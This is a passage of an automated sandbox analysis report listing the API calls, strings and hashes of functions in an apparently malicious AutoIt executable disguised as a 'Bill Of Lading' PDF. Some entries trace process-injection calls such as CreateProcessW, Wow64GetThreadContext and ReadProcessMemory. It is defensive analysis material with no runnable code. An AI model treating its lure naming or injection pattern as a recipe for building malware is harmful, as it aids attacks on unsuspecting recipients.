                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                      • API String ID: 1004883554-2276155026
                                                                                                                      • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                      • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                      • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2477803136-0
                                                                                                                      • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                                                                      • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                                                                                      • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 3888824918-3121273764
                                                                                                                      • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                      • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                      • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                      • RegisterClassExW.USER32 ref: 00410359
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                      • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(00A50870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                      • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                      • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                      • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                      • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                      • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                        • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                        • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                        • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                        • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                        • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                        • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                        • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A50870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$PGH
                                                                                                                      • API String ID: 423443420-3673556320
                                                                                                                      • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                      • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                      • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • _fseek.LIBCMT ref: 004525DA
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                      • _fseek.LIBCMT ref: 0045267D
                                                                                                                      • _malloc.LIBCMT ref: 00452689
                                                                                                                      • _malloc.LIBCMT ref: 00452696
                                                                                                                      • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1911931848-0
                                                                                                                      • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                      • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                      • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                      • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                                                      Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __fread_nolock_fseek_strcat
• String ID: AU3!$EA06
• API String ID: 3818483258-2658333250
• Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
• Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcscpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
• API String ID: 192938534-971228906
• Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
• Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04022AE9
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04022D0F
Memory Dump Source
• Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
• Instruction ID: c1e00cb504eaa307ea311cfdc18a0d6ab4d4f69dbc46d1e4a41e65e631715753
• Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
• Instruction Fuzzy Hash: F7A11774E00219EBDB14CFE4CA94BEEBBB5BF48304F208599E501BB2C0D775AA81DB55

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
• Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Control-flow Graph

APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00401C62
• _wcsncpy.LIBCMT ref: 00401CA1
• _wcscpy.LIBCMT ref: 00401CBD
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1620655955-1585850449
• Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
• Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

Control-flow Graph

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
• ShowWindow.USER32(?,00000000), ref: 00410454
• ShowWindow.USER32(?,00000000), ref: 0041045E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
• Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
• Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
• Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 040226A8: Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04022904
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: YCC24SNUFIFGMYGL29YL5GKXLMBKJ
                                                                                                                      • API String ID: 2694422964-76732643
                                                                                                                      • Opcode ID: 0f12f549611eb9110984487352bf2c0f6f0a20de29ebe12cc5b18359a63a1617
                                                                                                                      • Instruction ID: 99203af3cd0c8cd736c121d498f9fa5bbb87fa1a1dc180af2649d0bb9a96b34b
                                                                                                                      • Opcode Fuzzy Hash: 0f12f549611eb9110984487352bf2c0f6f0a20de29ebe12cc5b18359a63a1617
                                                                                                                      • Instruction Fuzzy Hash: 8C618470D08298DAEF11DBF4D848BEEBBB5AF19304F044199E2487B2C1D7B91B45CB66
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 00413AA6
                                                                                                                        • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                        • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                        • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                      • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                      • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                      • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                      • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                      • _strcat.LIBCMT ref: 0040F603
                                                                                                                        • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                        • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1194219731-2761332787
                                                                                                                      • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                      • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                      • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                      • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 04021E63
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04021EF9
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04021F1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction ID: 736eecee7dda230a2b8a3689ab7a8c9de904454b8b416e12eb28b7fcfbeff471
                                                                                                                      • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction Fuzzy Hash: BA62FB30A142189BEB24CFA4C940BDEB376EF58300F1091A9D50DFB2D4E77A9E85CB59
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040E202
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 928536360-0
                                                                                                                      • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
